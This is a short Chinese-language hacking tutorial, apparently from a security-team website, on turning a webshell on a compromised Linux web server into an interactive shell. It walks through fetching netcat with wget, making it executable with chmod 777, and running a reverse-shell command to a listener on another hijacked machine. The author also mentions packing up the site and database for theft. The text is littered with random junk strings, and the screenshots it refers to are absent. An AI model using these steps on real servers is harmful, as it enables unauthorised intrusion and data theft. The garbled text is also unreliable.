From:www.3est.com
Author:robout
废话一点点,方面比我还菜的菜鸟看到LINUX就不敢日下去。
要继续日下去,目的各有各自的目的。$W,o5C,^$m(C;Z%U*[
偶一般只是喜欢把网站+数据库打包。。没有幽默细胞。不废话了。"R/y2i l-s-E
直接进主题
R首先你要搞到一个webshell,然后用WEBSHELL上传一个NC(可不是WIN下面那个NC.EXE哦!!)3v6w/B.~:u-e+v8q,c-w
上传NC到一个可以写的目录(这不是废话,没写的权限怎么传的上去啊!!)#C'R"B:Y1X&S2?4r!@
在LINUX下可以用ls-al查看

然后在WEBSHELL上利用wget命令传个NC,z2^,E1C0[#T,w(]2V

*N'E8j/j'O!T1y
继续看这里[3E.S.T]信息安全技术团队3ESecurityTeam3l!P,z+K&n

*[7R:B&k*])o/G'i,r#[/X
没有执行权限,需要用chmod777nc

[切换到NC目录执行NC反弹SHELL命令

偶找只LINUX肉鸡在肉鸡上做的NC监听

看已经连接上了。

#k8a"J3V!l4H
看下当前目录确认下是不是连接上了8N3K6B6E!b:d

;S)H!^.H%F3u;X-o%`
靠管理ROOT在呢。。[3E.S.T]信息安全技术团队3ESecurityTeam7e.r&`0X$A
不过在此之前网站包子已经打好了。。
在啰唆下。
本地监听端口:./nc-vv-l-p监听端口
WEBSHELL上nc反弹shell命令:cd/var/tmp;./nc-vvyouip监听端口-e/bin/bash7D(T/z:z*a
-------------------------------
END!!
*
* |